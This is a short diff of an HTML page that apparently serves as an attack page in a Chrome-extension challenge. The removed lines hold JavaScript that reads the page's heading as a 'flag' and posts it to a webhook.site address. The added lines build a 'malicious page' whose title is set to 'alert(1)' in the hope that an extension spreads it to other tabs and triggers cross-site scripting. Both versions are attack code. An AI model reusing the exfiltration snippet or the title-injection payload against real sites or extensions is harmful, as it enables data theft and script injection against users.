--- a/index.html
+++ b/index.html
@@ -18,21 +18,18 @@
 -->
 
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
-setTimeout(() => {
-  document.title = document.querySelector("h1").innerText; // Copy sensitive info
-}, 2000);
-
-setTimeout(() => {
-  let stolenFlag = document.title;
-  fetch('https://webhook.site/fd72ea59-3fa6-4bc7-8a83-176bf7ad585b', {
-    method: 'POST',
-    body: JSON.stringify({flag: stolenFlag}),
-    headers: {'Content-Type': 'application/json'}
-  });
-}, 5000);
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Malicious Page</title>
+    <script>
+        // Set the title to a malicious payload
+        document.title = "alert(1)";
+    </script>
 </head>
 <body>
+    <h1>This is a malicious page!</h1>
+    <p>If the Chrome extension is active, it may propagate the title to other tabs, potentially triggering XSS.</p>
 </body>
 </html>
